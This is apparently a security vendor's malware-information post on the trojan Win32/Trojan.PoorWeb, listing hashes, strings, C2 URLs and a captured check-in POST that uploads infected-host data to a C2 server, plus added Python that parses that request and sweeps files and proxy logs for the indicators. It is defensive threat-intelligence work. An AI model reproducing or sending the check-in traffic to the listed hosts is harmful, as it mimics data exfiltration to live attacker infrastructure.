Wins blog

Security Information

Malware Info: Win32/Trojan.PoorWeb
Posted 2018-10-12 | Views 445

ㅁ Malware IoC

  Pattern     Win32/Trojan.PoorWeb
  Filename    -
  Type        PE (exe)
  Size        41,472 bytes
  MD5         d37124b137c2087d7a908fd136a4866e

  Pattern     Win32/Trojan.PoorWeb
  Filename    -
  Type        PE (exe)
  Size        39,936 bytes
  MD5         6900bbd0b505126c4461ae21bb4cf85d


ㅁ Malware Traffic

The sample reports to its C2 with a multipart/form-data POST. The "kind" field is the single character "u", and the "fname" part is a file upload whose body carries the infected host's information; the filename value (000c29659d890000) is a per-host identifier that looks like a zero-padded MAC address (00:0c:29 is a VMware OUI, consistent with an analysis VM).

POST /skin15/include/bin/forlab.php HTTP/1.1
Host: youngs.dgweb.kr:80
Content-type: multipart/form-data;boundary=-----------------------------000610c004914
Content-Length: 1145

-------------------------------000610c004914
Content-Disposition: multipart/form-data; name="kind"

u
-------------------------------000610c004914
Content-Disposition: multipart/form-data; name="fname"; filename="000c29659d890000"

P...BX....)e........youngs.dgweb.kr.............../skin15/include/bin/forlab.php...........

[infected host information]

-------------------------------000610c004914--

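To turn the capture above into a detection, the request has to be parsed down to its multipart parts, since the distinctive features are structural (a "kind" field plus a "fname" upload with a 16-hex-character filename) rather than a fixed string. The following Python is an added example written for this post, not code from Wins or from the Sniper engine. The C2 host and path are the ones shown in the capture; the file part's body in the re-created request is placeholder bytes standing in for the real host-information blob, which the capture only shows truncated.

```python
"""Parse the PoorWeb check-in POST and flag it on its structural features."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Indicators taken from the captured request.
C2_HOST = "youngs.dgweb.kr"
C2_PATH = "/skin15/include/bin/forlab.php"
# Boundary as it appears in the Content-type header; body delimiters are "--" + boundary.
BOUNDARY = "-----------------------------000610c004914"


@dataclass
class Part:
    name: str
    filename: Optional[str]
    body: bytes


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: Dict[str, str]
    body: bytes


def parse_request(raw: bytes) -> HttpRequest:
    """Split a raw HTTP/1.1 request into request line, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("ascii").split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        key, _, value = line.decode("latin-1").partition(":")
        headers[key.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


def parse_multipart(req: HttpRequest) -> List[Part]:
    """Parse multipart/form-data parts (RFC 7578): each part is introduced by
    '--' + boundary, the last one is closed by '--' + boundary + '--'."""
    match = re.search(r"boundary=([^;]+)", req.headers.get("content-type", ""))
    if not match:
        return []
    delim = b"--" + match.group(1).strip().strip('"').encode()
    parts: List[Part] = []
    for chunk in req.body.split(delim)[1:]:
        if chunk.startswith(b"--"):  # closing delimiter reached
            break
        hdr, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        disp = hdr.decode("latin-1")
        name = re.search(r'name="([^"]*)"', disp)
        fname = re.search(r'filename="([^"]*)"', disp)
        parts.append(Part(name.group(1) if name else "",
                          fname.group(1) if fname else None,
                          data.rstrip(b"\r\n")))
    return parts


def is_poorweb_checkin(req: HttpRequest) -> bool:
    """Match the shape of the captured traffic: a POST to the forlab.php path whose
    multipart body has a 'kind' field and a 'fname' upload named with 16 hex digits.
    The Host header is checked separately so a moved C2 on the same kit is still caught."""
    if req.method != "POST" or req.path != C2_PATH:
        return False
    parts = {p.name: p for p in parse_multipart(req)}
    upload = parts.get("fname")
    return ("kind" in parts and upload is not None and upload.filename is not None
            and re.fullmatch(r"[0-9a-f]{16}", upload.filename) is not None)


def host_is_known_c2(req: HttpRequest) -> bool:
    """True when the Host header (port stripped) is the C2 from the capture."""
    return req.headers.get("host", "").split(":")[0] == C2_HOST


def build_sample() -> bytes:
    """Constructed re-creation of the captured request. The upload body is a
    placeholder; the real blob is only shown truncated in the capture."""
    body = (
        f"--{BOUNDARY}\r\n"
        'Content-Disposition: multipart/form-data; name="kind"\r\n\r\n'
        "u\r\n"
        f"--{BOUNDARY}\r\n"
        'Content-Disposition: multipart/form-data; name="fname"; filename="000c29659d890000"\r\n\r\n'
    ).encode() + b"<constructed host info>\r\n" + f"--{BOUNDARY}--\r\n".encode()
    head = (
        f"POST {C2_PATH} HTTP/1.1\r\n"
        f"Host: {C2_HOST}:80\r\n"
        f"Content-type: multipart/form-data;boundary={BOUNDARY}\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    ).encode()
    return head + body


if __name__ == "__main__":
    request = parse_request(build_sample())
    for part in parse_multipart(request):
        print(part.name, part.filename, part.body[:16])
    print("poorweb check-in:", is_poorweb_checkin(request), "known C2 host:", host_is_known_c2(request))
```

Keying the verdict on path plus body structure, and reporting the Host match separately, is deliberate: the hostname is the indicator most likely to change between campaigns, while the PHP endpoint and the upload layout are baked into the sample.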

ㅁ Malware String

 - hdevmng.exe
 - Alibaba.exe
 - God2me
 - 9g8u4_55559y(ighiserh5)
 - youngs.dgweb.kr

ㅁ Malware C2

 - youngs[.]dgweb[.]kr:80/skin15/include/bin/forlab.php
 - 211[.]218[.]126[.]236/ct/data/icon/files/goal.php?miracles=1
 - 211[.]218[.]126[.]236/ct/data/icon/files/goal.php?miracles=2


ㅁ Malware Hash

 - 74BF82F2FAA1FCE36A8F3509B20FF30AA055911CF78EAC51181644D2BEB10B33
 - 002132D1AACD5F8DCD28FAC86BD25C2EE666B4726DED3E263F43482E1436A1A7
 - D057088D0DE3D920EA0939217C756274018B6E89CBFC74F66F50A9D27A384B09
 - 26B8951C0979286D2994C115B06D7A28C0DB67432809B32CCF5FCB2199576641

ㅁ Wins Sniper Pattern

 - [4508] Win32/Trojan.PoorWeb.41472
 - [4509] Win32/Trojan.PoorWeb.39936
 - [4508] Win32/Trojan.PoorWeb.Connection

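The string, C2 and hash sections above are the indicators a responder would sweep an estate with. The Python below is an added example for this post, not Wins code: it refangs the "[.]" notation used in the C2 list, matches a file's MD5 and SHA-256 against the listed hashes, looks for the listed strings in the file bytes, and flags proxy-log lines that reach a listed C2 host and path. The hashes are taken from the post (64 hex digits, so compared as SHA-256). The sample file bytes and the proxy-log format ("timestamp client method host path") are constructed for the example; a real file will only hash-match if it is one of the listed samples.

```python
"""Sweep files and proxy logs for the PoorWeb indicators listed in the post."""
import hashlib
from typing import Dict, List, Optional, Set, Tuple

# Indicators copied from the post (hashes lower-cased for comparison).
MD5S = {"d37124b137c2087d7a908fd136a4866e", "6900bbd0b505126c4461ae21bb4cf85d"}
SHA256S = {
    "74bf82f2faa1fce36a8f3509b20ff30aa055911cf78eac51181644d2beb10b33",
    "002132d1aacd5f8dcd28fac86bd25c2ee666b4726ded3e263f43482e1436a1a7",
    "d057088d0de3d920ea0939217c756274018b6e89cbfc74f66f50a9d27a384b09",
    "26b8951c0979286d2994c115b06d7a28c0db67432809b32ccf5fcb2199576641",
}
STRINGS = [b"hdevmng.exe", b"Alibaba.exe", b"God2me", b"9g8u4_55559y(ighiserh5)", b"youngs.dgweb.kr"]
C2_DEFANGED = [
    "youngs[.]dgweb[.]kr:80/skin15/include/bin/forlab.php",
    "211[.]218[.]126[.]236/ct/data/icon/files/goal.php?miracles=1",
    "211[.]218[.]126[.]236/ct/data/icon/files/goal.php?miracles=2",
]


def refang(ioc: str) -> str:
    """Undo the defanging used in the post so the indicator can be compared with live data."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def split_c2(ioc: str) -> Tuple[str, str]:
    """Return (host, path-without-query) from a 'host[:port]/path?query' indicator.
    The query is dropped so goal.php?miracles=1 and =2 collapse to one endpoint."""
    hostport, _, rest = refang(ioc).partition("/")
    return hostport.split(":")[0], "/" + rest.split("?")[0]


def hash_hits(data: bytes) -> Dict[str, Optional[str]]:
    """Return the MD5 and SHA-256 that matched the post's lists, or None for each miss."""
    md5 = hashlib.md5(data).hexdigest()
    sha256 = hashlib.sha256(data).hexdigest()
    return {"md5": md5 if md5 in MD5S else None, "sha256": sha256 if sha256 in SHA256S else None}


def string_hits(data: bytes) -> List[str]:
    """Listed strings present in the file, in list order."""
    return [s.decode() for s in STRINGS if s in data]


def scan_proxy_log(lines: List[str]) -> List[str]:
    """Flag lines whose host and path (query ignored) match a listed C2.
    Constructed log format: '<timestamp> <client> <method> <host> <path>'."""
    c2: Set[Tuple[str, str]] = {split_c2(i) for i in C2_DEFANGED}
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        host = fields[3].split(":")[0]
        path = fields[4].split("?")[0]
        if (host, path) in c2:
            hits.append(line)
    return hits


# Constructed sample: a fake PE stub carrying three of the listed strings.
SAMPLE_FILE = b"MZ\x90\x00" + b"\x00" * 60 + b"hdevmng.exe\x00God2me\x00youngs.dgweb.kr\x00"

# Constructed proxy log; the third line is benign.
SAMPLE_LOG = [
    "2018-10-11T09:12:03Z 10.0.0.21 POST youngs.dgweb.kr:80 /skin15/include/bin/forlab.php",
    "2018-10-11T09:12:05Z 10.0.0.21 GET 211.218.126.236 /ct/data/icon/files/goal.php?miracles=1",
    "2018-10-11T09:13:00Z 10.0.0.33 GET www.example.com /index.html",
]


if __name__ == "__main__":
    print("hash hits:", hash_hits(SAMPLE_FILE))
    print("string hits:", string_hits(SAMPLE_FILE))
    for hit in scan_proxy_log(SAMPLE_LOG):
        print("C2 contact:", hit)
```

String hits are triage signals rather than verdicts: "Alibaba.exe" and a hostname can appear in benign files, so a string-only match should lead to a hash or sandbox check rather than straight to a detection.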
Source

https://www.virustotal.com/#/file/d9a967d0caa8db86feca3ae469ef6797e81dfdac4d8531658cb242a87c80ce05/detection

Tags: Malware Info  Trojan  PoorWeb